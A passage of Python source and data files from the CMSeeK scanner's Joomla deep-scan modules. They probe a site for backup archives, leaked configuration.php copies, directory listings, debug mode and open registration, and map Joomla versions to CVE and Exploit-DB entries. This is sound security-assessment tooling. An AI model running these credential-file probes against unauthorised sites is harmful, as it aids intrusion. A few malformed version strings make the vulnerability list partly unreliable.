20 | backup_files = ['1.txt','2.txt','1.gz','1.rar','1.save','1.tar','1.tar.bz2','1.tar.gz','1.tgz','1.tmp','1.zip','2.back','2.backup','2.gz','2.rar','2.save','2.tar','2.tar.bz2','2.tar.gz','2.tgz','2.tmp','2.zip','backup.back','backup.backup','backup.bak','backup.bck','backup.bkp','backup.copy','backup.gz','backup.old','backup.orig','backup.rar','backup.sav','backup.save','backup.sql~','backup.sql.back','backup.sql.backup','backup.sql.bak','backup.sql.bck','backup.sql.bkp','backup.sql.copy','backup.sql.gz','backup.sql.old','backup.sql.orig','backup.sql.rar','backup.sql.sav','backup.sql.save','backup.sql.tar','backup.sql.tar.bz2','backup.sql.tar.gz','backup.sql.tgz','backup.sql.tmp','backup.sql.txt','backup.sql.zip','backup.tar','backup.tar.bz2','backup.tar.gz','backup.tgz','backup.txt','backup.zip','database.back','database.backup','database.bak','database.bck','database.bkp','database.copy','database.gz','database.old','database.orig','database.rar','database.sav','database.save','database.sql~','database.sql.back','database.sql.backup','database.sql.bak','database.sql.bck','database.sql.bkp','database.sql.copy','database.sql.gz','database.sql.old','database.sql.orig','database.sql.rar','database.sql.sav','database.sql.save','database.sql.tar','database.sql.tar.bz2','database.sql.tar.gz','database.sql.tgz','database.sql.tmp','database.sql.txt','database.sql.zip','database.tar','database.tar.bz2','database.tar.gz','database.tgz','database.tmp','database.txt','database.zip','joom.back','joom.backup','joom.bak','joom.bck','joom.bkp','joom.copy','joom.gz','joomla.back','Joomla.back','joomla.backup','Joomla.backup','joomla.bak','Joomla.bak','joomla.bck','Joomla.bck','joomla.bkp','Joomla.bkp','joomla.copy','Joomla.copy','joomla.gz','Joomla.gz','joomla.old','Joomla.old','joomla.orig','Joomla.orig','joomla.rar','Joomla.rar','joomla.sav','Joomla.sav','joomla.save','Joomla.save','joomla.tar','Joomla.tar','joomla.tar.bz2','Joomla.tar.bz2','joomla.tar.gz','Joomla.tar.gz','joomla.tgz','Joomla.tgz','joomla.zip','Joomla.zip','joom.old','joom.orig','joom.rar','joom.sav','joom.save','joom.tar','joom.tar.bz2','joom.tar.gz','joom.tgz','joom.zip','site.back','site.backup','site.bak','site.bck','site.bkp','site.copy','site.gz','site.old','site.orig','site.rar','site.sav','site.save','site.tar','site.tar.bz2','site.tar.gz','site.tgz','site.zip','sql.zip.back','sql.zip.backup','sql.zip.bak','sql.zip.bck','sql.zip.bkp','sql.zip.copy','sql.zip.gz','sql.zip.old','sql.zip.orig','sql.zip.save','sql.zip.tar','sql.zip.tar.bz2','sql.zip.tar.gz','sql.zip.tgz','upload.back','upload.backup','upload.bak','upload.bck','upload.bkp','upload.copy','upload.gz','upload.old','upload.orig','upload.rar','upload.sav','upload.save','upload.tar','upload.tar.bz2','upload.tar.gz','upload.tgz','upload.zip'] | |
21 | ||
22 | threads = [threading.Thread(target=check_backup, args=(url, file ,ua)) for file in backup_files] | |
23 | for thread in threads: | |
24 | thread.start() | |
25 | for thread in threads: | |
26 | thread.join() | |
27 | ||
28 | global joom_bak_found, joom_backups | |
29 | return [joom_bak_found, joom_backups] |
0 | #!/usr/bin/python3 | |
1 | # -*- coding: utf-8 -*- | |
2 | # This is a part of CMSeeK, check the LICENSE file for more information | |
3 | # Copyright (c) 2018 - 2020 Tuhinshubhra | |
4 | ||
5 | import cmseekdb.basic as cmseek | |
6 | # I know there is no reason at all to create a separate module for this.. there's something that's going to be added here so.. trust me! | |
7 | def start(source): | |
8 | # print(source) | |
9 | if 'Joomla! Debug Console' in source or 'xdebug.org/docs/all_settings' in source: | |
10 | cmseek.success('Debug mode on!') | |
11 | return '1' | |
12 | else: | |
13 | return '0' |
0 | #!/usr/bin/python3 | |
1 | # -*- coding: utf-8 -*- | |
2 | # This is a part of CMSeeK, check the LICENSE file for more information | |
3 | # Copyright (c) 2018 - 2020 Tuhinshubhra | |
4 | ||
5 | import cmseekdb.basic as cmseek | |
6 | ||
7 | def start(url,ua): | |
8 | reg_url = url + '/index.php?option=com_users&view=registration' | |
9 | reg_source = cmseek.getsource(reg_url, ua) | |
10 | if reg_source[0] == '1': | |
11 | if 'registration.register' in reg_source[1] or 'jform_password2' in reg_source[1] or 'jform_email2' in reg_source[1]: | |
12 | cmseek.success('User registration open, ' + cmseek.bold + reg_url + cmseek.cln) | |
13 | return ['1', reg_url] | |
14 | else: | |
15 | return ['0', ''] | |
16 | else: | |
17 | return ['0', ''] |
0 | #!/usr/bin/python3 | |
1 | # -*- coding: utf-8 -*- | |
2 | # This is a part of CMSeeK, check the LICENSE file for more information | |
3 | # Copyright (c) 2018 - 2020 Tuhinshubhra | |
4 | ||
5 | import threading | |
6 | import cmseekdb.basic as cmseek | |
7 | ||
8 | joom_conf_found = 0 | |
9 | joom_confs = [] | |
10 | ||
11 | def check_config(url,file,ua): | |
12 | global joom_conf_found, joom_confs | |
13 | file_check = cmseek.check_url(url + '/' + file, ua) | |
14 | if file_check == '1': | |
15 | cmseek.success('Potential configuration file found: ' + cmseek.bold + cmseek.fgreen + file + cmseek.cln) | |
16 | joom_conf_found += 1 | |
17 | joom_confs.append(file) | |
18 | ||
19 | def start(url, ua): | |
20 | config_files = ['configuration.php~','configuration.php.new','configuration.php.new~','configuration.php.old','configuration.php.old~','configuration.bak','configuration.php.bak','configuration.php.bkp','configuration.txt','configuration.php.txt','configuration - Copy.php','configuration.php.swo','configuration.php_bak','configuration.orig','configuration.php.save','configuration.php.original','configuration.php.swp','configuration.save','.configuration.php.swp','configuration.php1','configuration.php2','configuration.php3','configuration.php4','configuration.php4','configuration.php6','configuration.php7','configuration.phtml','configuration.php-dist'] | |
21 | ||
22 | threads = [threading.Thread(target=check_config, args=(url, file ,ua)) for file in config_files] | |
23 | for thread in threads: | |
24 | thread.start() | |
25 | for thread in threads: | |
26 | thread.join() | |
27 | ||
28 | global joom_conf_found, joom_confs | |
29 | return [joom_conf_found, joom_confs] |
0 | #!/usr/bin/python3 | |
1 | # -*- coding: utf-8 -*- | |
2 | # This is a part of CMSeeK, check the LICENSE file for more information | |
3 | # Copyright (c) 2018 - 2020 Tuhinshubhra | |
4 | ||
5 | import os | |
6 | import cmseekdb.basic as cmseek | |
7 | ||
8 | def start(version): | |
9 | if version != '0': | |
10 | vuln_file = os.getcwd() + '/deepscans/joom/database/corevul.txt' # shoutouts to joomscan | |
11 | if os.path.isfile(vuln_file): | |
12 | vuln_detection = '1' # version detection successful and vuln db loaded as well | |
13 | vuln_count = 0 | |
14 | joom_vulns = [] | |
15 | f = open(vuln_file, 'r') | |
16 | vuln_db = f.read() | |
17 | vulns = vuln_db.split('\n') | |
18 | for vuln in vulns: | |
19 | if version in vuln: | |
20 | cmseek.warning('Joomla core vulnerability detected') | |
21 | vuln_count += 1 | |
22 | vul = vuln.split('|') | |
23 | # print(vul[1]) | |
24 | joom_vulns.append(vul[1]) | |
25 | return [vuln_detection, vuln_count, joom_vulns] | |
26 | else: | |
27 | vuln_detection = '3' # version was detected but vulnerability database not found | |
28 | vuln_count = 0 | |
29 | joom_vulns = [] | |
30 | return [vuln_detection, vuln_count, joom_vulns] | |
31 | ||
32 | else: | |
33 | vuln_detection = '2' # detection failed due to no version info | |
34 | vuln_count = 0 | |
35 | joom_vulns = [] | |
36 | return [vuln_detection, vuln_count, joom_vulns] |
0 | 1.0.7|Joomla! 1.0.7 / Mambo 4.5.3 - (feed) Full Path Disclosure / Denial of Service\nEDB : https://www.exploit-db.com/exploits/1698/ | |
1 | 1.0.9|Joomla! 1.0.9 - (Weblinks) Blind SQL Injection\nCVE : CVE-2006-7247\nEDB : https://www.exploit-db.com/exploits/1922/ | |
2 | 1.5.0|Joomla! 1.5 Beta 2 - 'Search' Remote Code Execution\nEDB : https://www.exploit-db.com/exploits/4212/ | |
3 | 1.5.0|Joomla! 1.5 Beta1/Beta2/RC1 - SQL Injection\nCVE : CVE-2007-4781\nEDB : https://www.exploit-db.com/exploits/4350/ | |
4 | 1.5.5,1.5.4,1.5.3,1.5.2,1.5.1,1.5.0|Joomla! 1.5.x - (Token) Remote Admin Change Password\nCVE : CVE-2008-3681\nEDB : https://www.exploit-db.com/exploits/6234/ | |
5 | 1.5.11,1.5.10,1.5.9,1.5.8,1.5.7,1.5.6,1.5.5,1.5.4,1.5.3,1.5.2,1.5.1|Joomla! 1.5.x - Cross-Site Scripting / Information Disclosure\nCVE: CVE-2011-4909\nEDB : https://www.exploit-db.com/exploits/33061/ | |
6 | 1.5.11,1.5.10,1.5.9,1.5.8,1.5.7,1.5.6,1.5.5,1.5.4,1.5.3,1.5.2,1.5.1|Joomla! 1.5.x - 404 Error Page Cross-Site Scripting\nEDB : https://www.exploit-db.com/exploits/33378/ | |
7 | 1.5.12|Joomla! 1.5.12 - read/exec Remote files\nEDB : https://www.exploit-db.com/exploits/11263/ | |
8 | 1.5.12|Joomla! 1.5.12 - connect back Exploit\nEDB : https://www.exploit-db.com/exploits/11262/ | |
9 | 1.6.0|Joomla! 1.6.0-Alpha2 - Cross-Site Scripting\nEDB : https://www.exploit-db.com/exploits/12489/ | |
10 | 1.5.12|Joomla! Plugin 'tinybrowser' 1.5.12 - Arbitrary File Upload / Code Execution (Metasploit)\nCVE : CVE-2011-4908\nEDB : https://www.exploit-db.com/exploits/9926/ | |
11 | 1.5|Joomla! 1.5 - URL Redirecting\nEDB : https://www.exploit-db.com/exploits/14722/ | |
12 | 1.5.21,1.5.20,1.5.19,1.5.18,1.5.17,1.5.16,1.5.15,1.5.14,1.5.13,1.5.12,1.5.11,1.5.10,1.5.9,1.5.8,1.5.7,1.5.6,1.5.5,1.5.4,1.5.3,1.5.2,1.5.1|Joomla! 1.5.x - SQL Error Information Disclosure\nEDB : https://www.exploit-db.com/exploits/34955/ | |
13 | 1.0.15,1.0.14,1.0.13,1.0.12,1.0.11,1.0.10,1.0.9,1.0.8,1.0.7,1.0.4,1.0.3,1.0.2,1.0.1,1.0.0|Joomla! 1.0.x - 'ordering' Parameter Cross-Site Scripting\nCVE : CVE-2011-0005\nEDB : https://www.exploit-db.com/exploits/35167/ | |
14 | 4.5.1|Joomla! Plugin 'Captcha' 4.5.1 - Local File Disclosure\nEDB : https://www.exploit-db.com/exploits/15958/ | |
15 | 1.5.22,1.6.0|Joomla! - Spam Mail Relay\nEDB : https://www.exploit-db.com/exploits/15979/ | |
16 | 1.6.0|Joomla! 1.6 - Multiple SQL Injections\nCVE : CVE-2011-1151\nEDB : https://www.exploit-db.com/exploits/16992/ | |
17 | 1.5.22,1.6.0|Joomla! 1.5/1.6 - JFilterInput Cross-Site Scripting Bypass\nEDB : https://www.exploit-db.com/exploits/16091/ | |
18 | 1.6.3|Joomla! 1.6.3 - Multiple Cross-Site Scripting Vulnerabilities\nEDB : https://www.exploit-db.com/exploits/35894/ | |
19 | 1.6.3|Joomla! 1.6.3 - Cross-Site Request Forgery\nEDB : https://www.exploit-db.com/exploits/17496/ | |
20 | 1.6.3,1.6.2,1.6.1,1.6.4,1.6.0,1.6.5|Joomla! < 1.6.5 - Multiple Cross-Site Scripting Vulnerabilities\nEDB : https://www.exploit-db.com/exploits/35973/ | |
21 | 1.6.6,1.6.4,1.6.3,1.6.2,1.6.1,1.6.0,1.5.23,1.5.22,1.5.20,1.5.19,1.5.18,1.5.17,1.5.16,1.5.15,1.5.14,1.5.12,1.5.11,1.5.10,1.5.9,1.5.8,1.5.7,1.5.5,1.5.4,1.5.2,1.5.1,1.7.0,1.6.5,1.6.4,1.6.3,1.6.1,1.6.0,1.5.6,1.5.3,1.5.22,1.5.21,1.5.15,1.5.13,1.5.0|Joomla! < 1.7.0 - Multiple Cross-Site Scripting Vulnerabilities\nEDB : https://www.exploit-db.com/exploits/36176/ | |
22 | 2.5.1,2.5.0,1.7.5,1.7.4,1.7.3,1.7.2,1.7.1,1.7.0|Joomla! 'redirect.php' SQL Injection Vulnerability\nEDB : https://www.exploit-db.com/exploits/36913/ | |
23 | 2.5.0,2.5.1|Joomla! 2.5.0 < 2.5.1 - Time Based SQL Injection\nEDB : https://www.exploit-db.com/exploits/18618/ | |
24 | 2.5.4,2.5.3,2.5.2,2.5.1,2.5.0,3.0.2|Joomla! 'highlight.php' PHP Object Injection\nCVE : CVE-2013-1453\nEDB : https://www.exploit-db.com/exploits/24551/ | |
25 | 2.5.4,2.5.3,2.5.2,2.5.1,2.5.0,3.0.2|Joomla! 'remember.php' PHP Object Injection\nCVE : CVE-2013-3242\nEDB : https://www.exploit-db.com/exploits/25087/ | |
26 | 3.2.1|Joomla! 3.2.1 - SQL Injection\nEDB : https://www.exploit-db.com/exploits/31459/ | |
27 | 3.2,3.3,3.4.0,3.4.1,3.4.4,3.4.3,3.4.4|Joomla! 3.2.x < 3.4.4 - SQL Injection\nEDB : https://www.exploit-db.com/exploits/38534/ | |
28 | 2.5.4,2.5.3,2.5.2,2.5.1,2.5.0,1.7.5,1.7.4,1.7.3,1.7.2,1.7.1,1.6.6,1.6.4,1.6.3,1.6.2,1.6.1,1.6.0,1.5.26,1.5.23,1.5.22,1.5.20,1.5.19,1.5.18,1.5.17,1.5.16,1.5.15,1.5.14,1.5.12,1.5.11,1.5.10,1.5.9,1.5.8,1.5.7,1.5.5,1.5.4,1.5.2,1.5.1,1.6.5,1.5.6,1.5.3,1.5.21,1.5.13,1.5.0|Joomla! 1.5 < 3.4.5 - Object Injection Remote Command Execution\nCVE : CVE-2015-8562\nEDB : https://www.exploit-db.com/exploits/38977/ | |
29 | 2.5.4,2.5.3,2.5.2,2.5.1,2.5.0,1.7.5,1.7.4,1.7.3,1.7.2,1.7.1,1.6.6,1.6.4,1.6.3,1.6.2,1.6.1,1.6.0,1.5.26,1.5.23,1.5.22,1.5.20,1.5.19,1.5.18,1.5.17,1.5.16,1.5.15,1.5.14,1.5.12,1.5.11,1.5.10,1.5.9,1.5.8,1.5.7,1.5.5,1.5.4,1.5.2,1.5.1,1.6.5,1.5.6,1.5.3,1.5.21,1.5.13,1.5.0,1.0.0,1.1.0,1.2.0,1.3.0|Joomla! 1.0 < 3.4.5 - Object Injection 'x-forwarded-for' Header Remote Code Execution\nCVE : CVE-2015-8562 , CVE-2015-8566 \nEDB : https://www.exploit-db.com/exploits/39033/ | |
30 | 3.4.7,3.4.6,3.4.4,3.3.5,3.6.3,3.6.1,3.6.0,3.4.5|Joomla! 3.4.4 < 3.6.4 - Account Creation / Privilege Escalation\nCVE : CVE-2016-8870 , CVE-2016-8869 \nEDB : https://www.exploit-db.com/exploits/40637/ | |
31 | 3.4.7,3.4.6,3.4.4,3.4.3,3.4.2,3.4.1,3.4.0,3.3.6,3.3.5,3.3.4,3.3.3,3.3.2,3.3.1,3.3.0,3.2.6,3.2.5.0,3.2.4,3.2.3,3.2.2,3.2.1,3.1.6,3.1.5,3.1.4,3.1.1,3.1.0,3.0.4,3.0.3,3.0.1,3.0.0,2.5.26,2.5.25,2.5.24,2.5.19,2.5.18,2.5.17,2.5.16,2.5.15,2.5.14,2.5.13,2.5.11,2.5.10,2.5.9,2.5.8,2.5.7,2.5.6,2.5.5,2.5.4,2.5.3,2.5.2,2.5.1,2.5.0,1.7.5,1.7.4,1.7.3,1.7.2,1.7.1,1.7.0,1.6.6,1.6.4,1.6.3,1.6.2,1.6.1,1.6.0,3.6.4,3.6.3,3.6.1,3.6.0,3.4.5,3.2.0,2.5.0,1.7.0,1.6.5|Joomla! Core Remote Privilege Escalation Vulnerability\nCVE : CVE-2016-9838\nEDB : https://www.exploit-db.com/exploits/41157/ | |
32 | 1.6,1.7,2.5.0,2.5.1,2.5.2|Joomla! 1.6/1.7/2.5 privilege escalation vulnerability\nCVE : CVE-2012-1563\nEDB : https://www.exploit-db.com/exploits/41156/ | |
33 | 3.2.2|Joomla! v3.2.2 SQL injection\nhttps://developer.joomla.org/security/578-20140301-core-sql-injection.html | |
34 | 2.5.10,2.5.11,2.5.12,2.5.13,2.5.14,2.5.15,2.5.16,2.5.17,2.5.18,2.5.19,2.5.20,2.5.21,2.5.22,2.5.23,2.5.24,2.5.25,2.5.4,2.5.5,2.5.6,2.5.7,2.5.8,2.5.9,3.0.0,3.0.1,3.0.2,3.0.3,3.0.4,3.1.0,3.1.1,3.1.2,3.1.3,3.1.4,3.1.5,3.1.6,3.2.0,3.2.1,3.2.2,3.2.3,3.2.4,3.2.5,3.3.0,3.3.1,3.3.2,3.3.3,3.3.4|Joomla! Component Akeeba Kickstart - Unserialize Remote Code Execution\nCVE : CVE-2014-7228\nEDB : https://www.exploit-db.com/exploits/35033/ | |
35 | 2.5.4,2.5.3,2.5.2,2.5.1,2.5.0|Joomla! 'media.php' Arbitrary File Upload Vulnerability\nCVE : CVE-2013-5576\nEDB : https://www.exploit-db.com/exploits/27610/ | |
36 | 1.5.0|Joomla! 1.5.0 Beta - 'pcltar.php' Remote File Inclusion\nCVE : CVE-2007-2199\nEDB : https://www.exploit-db.com/exploits/3781/ | |
37 | 1.5.8|Joomla! Component xstandard editor 1.5.8 - Local Directory Traversal\nCVE : CVE-2009-0113\nEDB : https://www.exploit-db.com/exploits/7691/ | |
38 | 3.4.4|Joomla! 3.4.4 Component Content History - SQL Injection / Remote Code Execution (Metasploit)\nCVE : CVE-2015-7297 , CVE-2015-7857 , CVE-2015-7858 \nEDB : https://www.exploit-db.com/exploits/38797/ | |
39 | 2.5.7,2.5.6,2.5.5,2.5.4,2.5.3,2.5.2,2.5.1|Joomla! Clickjacking Security Bypass Vulnerability\nCVE : CVE-2012-5827\nhttps://developer.joomla.org/security/news/543-20121101-core-clickjacking.html\nhttps://developer.joomla.org/security/news/544-20121102-core-clickjacking.html | |
40 | 3.0.1|Joomla! Unspecified Information Disclosure Vulnerability\nCVE : CVE-2013-1454\nhttp://www.securityfocus.com/bid/57752 | |
41 | 3.0.1|Joomla! Unspecified Information Disclosure Vulnerability\nCVE : CVE-2013-1455\nhttp://www.securityfocus.com/bid/57751\nhttps://developer.joomla.org/security-centre/549-20130202-core-information-disclosure.html | |
42 | 3.0.3,3.0.1,3.0.02.5.9,2.5.8,2.5.7,2.5.6,2.5.5,2.5.4,2.5.3,2.5.2,2.5.1,2.5.0|Joomla! Highlighter Plugin Unspecified Cross-Site Scripting Vulnerability\nCVE : CVE-2013-3267 \nhttps://developer.joomla.org/security/86-20130407-core-xss-vulnerability.html | |
43 | 2.5.4,2.5.3,2.5.2,2.5.1|Joomla! Security Bypass Vulnerability\nCVE : CVE-2013-3056\nhttp://www.securityfocus.com/bid/59490/info | |
44 | 2.5.4,2.5.3,2.5.2,2.5.1|Joomla! Information Disclosure Vulnerability\nCVE : CVE-2013-3057\nhttp://www.securityfocus.com/bid/59489\nhttp://developer.joomla.org/security/82-20130402-core-information-disclosure.html | |
45 | 3.0.3,3.0.1,3.0.02.5.9,2.5.8,2.5.7,2.5.6,2.5.5,2.5.4,2.5.3,2.5.2,2.5.1|Joomla! Unspecified Cross-Site Scripting Vulnerability\nCVE : CVE-2013-3058\nhttp://www.securityfocus.com/bid/59483\nhttp://developer.joomla.org/security/81-20130403-core-xss-vulnerability.html | |
46 | 3.0.3,3.0.1,3.0.02.5.9,2.5.8,2.5.7,2.5.6,2.5.5,2.5.4,2.5.3,2.5.2,2.5.1|Joomla! Unspecified Cross-Site Scripting Vulnerability\nCVE : CVE-2013-3059\nhttps://developer.joomla.org/security/80-20130405-core-xss-vulnerability.html | |
47 | 3.3.3,3.3.0,3.2.4,3.2.3,3.2.2,3.2.1,3.2.0|Joomla! Cross Site Scripting Vulnerability\nCVE : Core CVE-2014-6631\nhttps://developer.joomla.org/security/593-20140901-core-xss-vulnerability.html | |
48 | 3.3.3,3.3,3.2.4,3.2.3,3.2.2,3.2.1,3.1.6,3.1.5,3.1.4,3.1.1,3.1.0,3.0.4,3.0.3,3.0.1,2.5.24,2.5.19,2.5.18,2.5.17,2.5.16,2.5.15,2.5.14,2.5.13,2.5.11,2.5.10,2.5.9,2.5.8,2.5.7,2.5.6,2.5.5,2.5.4,2.5.3,2.5.2,2.5.1,2.5.0,3.2.0|Joomla! Core Authentication Bypass Vulnerability\nCVE :CVE-2014-6632\nhttp://developer.joomla.org/security/594-20140902-core-unauthorised-logins.html | |
49 | 3.3.4,3.3.3,3.3.0,3.2.5,3.2.4,3.2.3,3.2.2,3.2.1,3.1.6,3.1.5,3.1.4,3.1.1,3.1.0,3.0.4,3.0.3,3.0.1,3.0.0,2.5.25,2.5.24,2.5.19,2.5.18,2.5.17,2.5.16,2.5.15,2.5.14,2.5.13,2.5.11,2.5.10,2.5.9,2.5.8,2.5.7,2.5.6,2.5.5,2.5.4,3.2.0|Joomla! Core Remote Denial of Service Vulnerability\nCVE : CVE-2014-7229\nhttps://developer.joomla.org/security/596-20140904-core-denial-of-service.html | |
50 | 3.4.1,3.4.0,3.3.6,3.3.5,3.3.4,3.3.3,3.3.2,3.3.1,3.3.0,3.2.6,3.2.5,3.2.4,3.2.3,3.2.2,3.2.1,3.1.6,3.1.5,3.1.4,3.1.1,3.1.0,3.0.4,3.0.3,3.0.1,3.0.0,3.2.0|Joomla! Open Redirection Vulnerability\nCVE : CVE-2015-5608\nhttp://www.securityfocus.com/bid/76496 | |
51 | 3.4.1,3.4.0,3.3.6,3.3.5,3.3.4,3.3.3,3.3.2,3.3.1,3.3.0,3.2.6,3.2.5,3.2.4,3.2.3,3.2.2,3.2.1,3.2.0|Joomla! Cross Site Request Forgery Vulnerability\nCVE : CVE-2015-5397\nhttps://developer.joomla.org/security-centre/618-20150602-core-remote-code-execution.html | |
52 | 3.4.3,3.4.2,3.4.1,3.4.0|Joomla! Core Cross Site Scripting Vulnerability\nCVE : CVE-2015-6939\nhttp://packetstormsecurity.com/files/133907/Joomla-CMS-3.4.3-Cross-Site-Scripting.html\nhttps://developer.joomla.org/security-centre/626-20150908-core-xss-vulnerability.html | |
53 | 3.4.4,3.4.3,3.4.2,3.4.1,3.4.0,3.3.6,3.3.5,3.3.4,3.3.3,3.3.2,3.3.1,3.3.0,3.2.6,3.2.5,3.2.4,3.2.3,3.2.2,3.2.1,3.2.0|Joomla! Core Security Bypass Vulnerability\nCVE : CVE-2015-7859\nhttps://developer.joomla.org/security-centre/629-20151002-core-acl-violations.html | |
54 | 3.4.4,3.4.3,3.4.2,3.4.1,3.4.0,3.3.6,3.3.5,3.3.4,3.3.3,3.3.2,3.3.1,3.3.0,3.2.6,3.2.5,3.2.4,3.2.3,3.2.2,3.2.1,3.4.5,3.2.0|Joomla! Directory Traversal Vulnerability\nCVE : CVE-2015-8565\nhttps://developer.joomla.org/security-centre/635-20151214-core-directory-traversal-2.html | |
55 | 3.4.4,3.4.3,3.4.2,3.4.1,3.4.0,3.4.5|Joomla! Directory Traversal Vulnerability\nCVE : CVE-2015-8564\nhttps://developer.joomla.org/security-centre/634-20151214-core-directory-traversal.html | |
56 | 3.4.4,3.4.3,3.4.2,3.4.1,3.4.0,3.3.6,3.3.5,3.3.4,3.3.3,3.3.2,3.3.1,3.3.0,3.2.6,3.2.5,3.2.4,3.2.3,3.2.2,3.2.1,3.4.5,3.2.0|Joomla! Core Cross Site Request Forgery Vulnerability\nCVE : CVE-2015-8563\nhttps://developer.joomla.org/security-centre/633-20151214-core-csrf-hardening.html | |
57 | 3.4.7,3.4.6,3.4.4,3.3.5,3.6.3,3.6.1,3.6.0,3.4.5|Joomla! Core Security Bypass Vulnerability\nCVE : CVE-2016-9081\nhttps://developer.joomla.org/security-centre/661-20161003-core-account-modifications.html | |
58 | 3.4.7,3.4.6,3.4.4,3.6.4,3.6.3,3.6.1,3.6.0,3.4.5|Joomla! Core Arbitrary File Upload Vulnerability\nCVE : CVE-2016-9836\nhttps://developer.joomla.org/security-centre/665-20161202-core-shell-upload.html | |
59 | 3.4.7,3.4.6,3.4.4,3.4.3,3.4.2,3.4.1,3.4.0,3.3.6,3.3.5,3.3.4,3.3.3,3.3.2,3.3.1,3.3.0,3.2.6,3.2.5,3.2.4,3.2.3,3.2.2,3.2.1,3.1.6,3.1.5,3.1.4,3.1.1,3.1.0,3.0.4,3.0.3,3.0.1,3.0.0,3.6.4,3.6.3,3.6.1,3.6.0,3.4.5,3.2.0|Joomla! Information Disclosure Vulnerability\nCVE : CVE-2016-9837\nhttps://developer.joomla.org/security-centre/666-20161203-core-information-disclosure.html | |
60 | 3.6.5,3.4.7,3.4.6,3.4.4,3.4.3,3.4.2,3.4.1,3.4.0,3.3.6,3.3.5,3.3.4,3.3.3,3.3.2,3.3.1,3.30.0,3.2.6,3.2.5,3.2.4,3.2.3,3.2.2,3.2.1,3.1.6,3.1.5,3.1.4,3.1.1,3.10.0,3.0.4,3.0.3,3.0.1,3.0.0,2.5.26,2.5.25,2.5.24,2.5.19,2.5.18,2.5.17,2.5.16,2.5.15,2.5.14,2.5.13,2.5.11,2.5.10,2.5.9,2.5.8,2.5.7,2.5.6,2.5.5,2.5.4,2.5.3,2.5.2,2.5.1,2.5.0,1.7.5,1.7.4,1.7.3,1.7.2,1.7.1,1.7.0,1.6.6,1.6.4,1.6.3,1.6.2,1.6.1,1.6.0,3.6.4,3.6.3,3.6.1,3.6.0,3.4.5,3.2.0,2.5.0,1.7.0,1.6.5|PHPMailer Remote Code Execution Vulnerability\nCVE : CVE-2016-10033\nhttps://www.rapid7.com/db/modules/exploit/multi/http/phpmailer_arg_injection\nhttps://github.com/opsxcq/exploit-CVE-2016-10033\nEDB : https://www.exploit-db.com/exploits/40969/ | |
61 | 3.6.5,3.4.7,3.4.6,3.4.4,3.4.3,3.4.2,3.4.1,3.4.0,3.3.6,3.3.5,3.3.4,3.3.3,3.3.2,3.3.1,3.30.0,3.2.6,3.2.5,3.2.4,3.2.3,3.2.2,3.2.1,3.1.6,3.1.5,3.1.4,3.1.1,3.10.0,3.0.4,3.0.3,3.0.1,3.0.0,2.5.26,2.5.25,2.5.24,2.5.19,2.5.18,2.5.17,2.5.16,2.5.15,2.5.14,2.5.13,2.5.11,2.5.10,2.5.9,2.5.8,2.5.7,2.5.6,2.5.5,2.5.4,2.5.3,2.5.2,2.5.1,2.5.0,1.7.5,1.7.4,1.7.3,1.7.2,1.7.1,1.7.0,1.6.6,1.6.4,1.6.3,1.6.2,1.6.1,1.6.0,3.6.4,3.6.3,3.6.1,3.6.0,3.4.5,3.2.0,2.5.0,1.7.0,1.6.5|PPHPMailer Incomplete Fix Remote Code Execution Vulnerability\nCVE : CVE-2016-10045\nhttps://www.rapid7.com/db/modules/exploit/multi/http/phpmailer_arg_injection\nEDB : https://www.exploit-db.com/exploits/40969/ |
0 | #!/usr/bin/python3 | |
1 | # -*- coding: utf-8 -*- | |
2 | # This is a part of CMSeeK, check the LICENSE file for more information | |
3 | # Copyright (c) 2018 - 2020 Tuhinshubhra | |
4 | ||
5 | import threading | |
6 | import cmseekdb.basic as cmseek | |
7 | ||
8 | joom_dir_found = 0 | |
9 | joom_dirs = [] | |
10 | ||
11 | def check_directory(url,file,ua): | |
12 | global joom_dir_found, joom_dirs | |
13 | file_check = cmseek.getsource(url + '/' + file, ua) | |
14 | if file_check[0] == '1': | |
15 | if 'Index of' in file_check[1] or 'Last modified</a>' in file_check[1]: | |
16 | cmseek.success('Directory listing enabled in: ' + cmseek.bold + cmseek.fgreen + file + cmseek.cln) | |
17 | joom_dir_found += 1 | |
18 | joom_dirs.append(file) | |
19 | ||
20 | def start(url, ua): | |
21 | directory_files = ['administrator/components','components','administrator/modules','modules','administrator/templates','templates','cache','images','includes','language','media','templates','tmp','images/stories','images/banners'] | |
22 | threads = [threading.Thread(target=check_directory, args=(url, file ,ua)) for file in directory_files] | |
23 | for thread in threads: | |
24 | thread.start() | |
25 | for thread in threads: | |
26 | thread.join() | |
27 | ||
28 | global joom_dir_found, joom_dirs | |
29 | return [joom_dir_found, joom_dirs] |
0 | #!/usr/bin/python3 | |
1 | # -*- coding: utf-8 -*- | |
2 | # This is a part of CMSeeK, check the LICENSE file for more information | |
3 | # Copyright (c) 2018 - 2020 Tuhinshubhra | |
4 | ||
5 | # Joomla DeepScan | |
6 | # Rev 1 | |
7 | # Props to joomscan.. big time! https://github.com/rezasp/joomscan | |
8 | ||
9 | import os | |
10 | import cmseekdb.basic as cmseek | |
11 | import VersionDetect.joom as version_detect | |
12 | import deepscans.joom.backups as backup_finder | |
13 | import deepscans.joom.config_leak as config_check | |
14 | import deepscans.joom.core_vuln as core_vuln | |
15 | import deepscans.joom.admin_finder as admin_finder | |
16 | import deepscans.joom.check_debug as check_debug | |
17 | import deepscans.joom.dir_list as dir_list | |
18 | import deepscans.joom.check_reg as user_registration | |
19 | ||
20 | def start(id, url, ua, ga, source): | |
21 | ||
22 | # Remove / from url | |
23 | if url.endswith("/"): | |
24 | url = url[:-1] | |
25 | ||
26 | # init variables | |
27 | vuln_detection = '0' | |
28 | vuln_count = 0 | |
29 | joom_vulns = [] | |
30 | ||
31 | # Version Detection | |
32 | version = version_detect.start(id, url, ua, ga, source) | |
33 | ||
34 | # Detecting joomla core vulnerabilities | |
35 | jcv = core_vuln.start(version) | |
36 | vuln_detection = jcv[0] | |
37 | vuln_count = jcv[1] | |
38 | joom_vulns = jcv[2] | |
39 | ||
40 | # README.txt | |
41 | readmesrc = cmseek.getsource(url + '/README.txt', ua) | |
42 | if readmesrc[0] != '1': ## something went wrong while getting the source codes | |
43 | cmseek.statement("Couldn't get readme file's source code most likely it's not present") | |
44 | readmefile = '0' | |
45 | elif 'This is a Joomla!' in readmesrc[1]: | |
46 | cmseek.info('README.txt file found') | |
47 | readmefile = '1' # Readme file present | |
48 | else: | |
49 | readmefile = '2' # Readme file found but most likely it's not of joomla | |
50 | ||
51 | # Debug Mode | |
52 | cmseek.info('Checking debug mode status') | |
53 | debug_mode = check_debug.start(source) | |
54 | ||
55 | # Check user registration status | |
